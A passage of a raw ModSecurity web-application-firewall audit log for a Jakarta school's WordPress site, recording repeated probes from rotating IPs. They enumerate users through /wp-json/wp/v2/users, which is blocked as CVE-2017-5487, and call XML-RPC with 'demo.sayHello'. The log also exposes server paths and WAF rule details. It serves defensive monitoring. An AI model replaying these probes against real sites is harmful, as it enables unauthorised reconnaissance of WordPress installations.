X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f5f857a-C-- demo.sayHello --0f5f857a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f5f857a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461053567898 5221 (- - -) Stopwatch2: 1746461053567898 5221; combined=4117, p1=520, p2=3353, p3=31, p4=35, p5=104, sr=73, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f5f857a-Z-- --b5ba5526-A-- [05/May/2025:23:08:04 +0700] aBjiZIZWvR7-42f6JrAM_gAAANY 103.236.140.4 46526 103.236.140.4 8181 --b5ba5526-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5ba5526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5ba5526-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461284879393 2390 (- - -) Stopwatch2: 1746461284879393 2390; combined=1372, p1=437, p2=904, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5ba5526-Z-- --2bec877d-A-- [05/May/2025:23:08:07 +0700] aBjiZ02V_h1VFAgsfgZ9KgAAAAU 103.236.140.4 46546 103.236.140.4 8181 --2bec877d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2bec877d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bec877d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461287103191 2320 (- - -) Stopwatch2: 1746461287103191 2320; combined=1091, p1=379, p2=684, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bec877d-Z-- --c6fc4f72-A-- [05/May/2025:23:08:08 +0700] aBjiaE2V_h1VFAgsfgZ9KwAAAAs 103.236.140.4 46552 103.236.140.4 8181 --c6fc4f72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c6fc4f72-C-- demo.sayHello --c6fc4f72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6fc4f72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461288078205 5026 (- - -) Stopwatch2: 1746461288078205 5026; combined=3986, p1=449, p2=3316, p3=34, p4=36, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6fc4f72-Z-- --1a67280f-A-- [05/May/2025:23:08:09 +0700] aBjiaU2V_h1VFAgsfgZ9LgAAABc 103.236.140.4 46574 103.236.140.4 8181 --1a67280f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1a67280f-C-- demo.sayHello --1a67280f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a67280f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461289880574 5858 (- - -) Stopwatch2: 1746461289880574 5858; combined=4242, p1=538, p2=3472, p3=34, p4=34, p5=96, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a67280f-Z-- --a3541d14-A-- [05/May/2025:23:08:11 +0700] aBjia02V_h1VFAgsfgZ9MQAAAAA 103.236.140.4 46584 103.236.140.4 8181 --a3541d14-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3541d14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3541d14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461291202210 3185 (- - -) Stopwatch2: 1746461291202210 3185; combined=1422, p1=471, p2=920, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3541d14-Z-- --a5ba9b03-A-- [05/May/2025:23:08:14 +0700] aBjibvZJDMuQndL03JNcwwAAAEw 103.236.140.4 46614 103.236.140.4 8181 --a5ba9b03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5ba9b03-C-- demo.sayHello --a5ba9b03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5ba9b03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461294180508 5017 (- - -) Stopwatch2: 1746461294180508 5017; combined=4085, p1=500, p2=3345, p3=33, p4=35, p5=101, sr=73, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5ba9b03-Z-- --6789c50f-A-- [05/May/2025:23:08:22 +0700] aBjidvZJDMuQndL03JNc0gAAAE8 103.236.140.4 46710 103.236.140.4 8181 --6789c50f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6789c50f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6789c50f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461302426946 2249 (- - -) Stopwatch2: 1746461302426946 2249; combined=1259, p1=400, p2=830, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6789c50f-Z-- --e063e642-A-- [05/May/2025:23:08:25 +0700] aBjiefZJDMuQndL03JNc2gAAAEA 103.236.140.4 46738 103.236.140.4 8181 --e063e642-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e063e642-C-- demo.sayHello --e063e642-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e063e642-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461305500119 5761 (- - -) Stopwatch2: 1746461305500119 5761; combined=4403, p1=607, p2=3517, p3=38, p4=43, p5=114, sr=79, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e063e642-Z-- --59639b03-A-- [05/May/2025:23:08:31 +0700] aBjifwRwKNFSM6B7_LagZAAAAJM 103.236.140.4 46786 103.236.140.4 8181 --59639b03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --59639b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59639b03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461311448882 3209 (- - -) Stopwatch2: 1746461311448882 3209; combined=1439, p1=496, p2=911, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59639b03-Z-- --c32d475e-A-- [05/May/2025:23:08:34 +0700] aBjiggRwKNFSM6B7_LagagAAAIo 103.236.140.4 46810 103.236.140.4 8181 --c32d475e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c32d475e-C-- demo.sayHello --c32d475e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c32d475e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461314518636 5480 (- - -) Stopwatch2: 1746461314518636 5480; combined=4203, p1=506, p2=3473, p3=33, p4=33, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c32d475e-Z-- --5e95f55b-A-- [05/May/2025:23:08:35 +0700] aBjigwRwKNFSM6B7_LagawAAAJA 103.236.140.4 46816 103.236.140.4 8181 --5e95f55b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e95f55b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e95f55b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461315179012 2616 (- - -) Stopwatch2: 1746461315179012 2616; combined=1218, p1=492, p2=700, p3=0, p4=0, p5=25, sr=182, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e95f55b-Z-- --76746432-A-- [05/May/2025:23:08:38 +0700] aBjihk2V_h1VFAgsfgZ9QwAAAAI 103.236.140.4 46850 103.236.140.4 8181 --76746432-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76746432-C-- demo.sayHello --76746432-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76746432-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461318347401 6115 (- - -) Stopwatch2: 1746461318347401 6115; combined=4989, p1=563, p2=4186, p3=39, p4=43, p5=95, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76746432-Z-- --ef83f87f-A-- [05/May/2025:23:09:06 +0700] aBjiovZJDMuQndL03JNc-QAAAEY 103.236.140.4 47094 103.236.140.4 8181 --ef83f87f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ef83f87f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef83f87f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461346508568 2571 (- - -) Stopwatch2: 1746461346508568 2571; combined=1269, p1=400, p2=840, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef83f87f-Z-- --e1f1fb32-A-- [05/May/2025:23:09:09 +0700] aBjipYZWvR7-42f6JrANFAAAAM0 103.236.140.4 47126 103.236.140.4 8181 --e1f1fb32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e1f1fb32-C-- demo.sayHello --e1f1fb32-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1f1fb32-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461349272267 5346 (- - -) Stopwatch2: 1746461349272267 5346; combined=4382, p1=529, p2=3502, p3=32, p4=34, p5=157, sr=71, sw=128, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1f1fb32-Z-- --1e37dd26-A-- [05/May/2025:23:09:18 +0700] aBjiroZWvR7-42f6JrANIQAAAMM 103.236.140.4 47204 103.236.140.4 8181 --1e37dd26-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e37dd26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e37dd26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461358076546 2341 (- - -) Stopwatch2: 1746461358076546 2341; combined=1093, p1=371, p2=696, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e37dd26-Z-- --aa4f382f-A-- [05/May/2025:23:09:20 +0700] aBjisPZJDMuQndL03JNdCgAAAFU 103.236.140.4 47248 103.236.140.4 8181 --aa4f382f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aa4f382f-C-- demo.sayHello --aa4f382f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa4f382f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461360861007 5298 (- - -) Stopwatch2: 1746461360861007 5298; combined=4076, p1=524, p2=3348, p3=35, p4=39, p5=78, sr=78, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa4f382f-Z-- --a5b1303b-A-- [05/May/2025:23:09:30 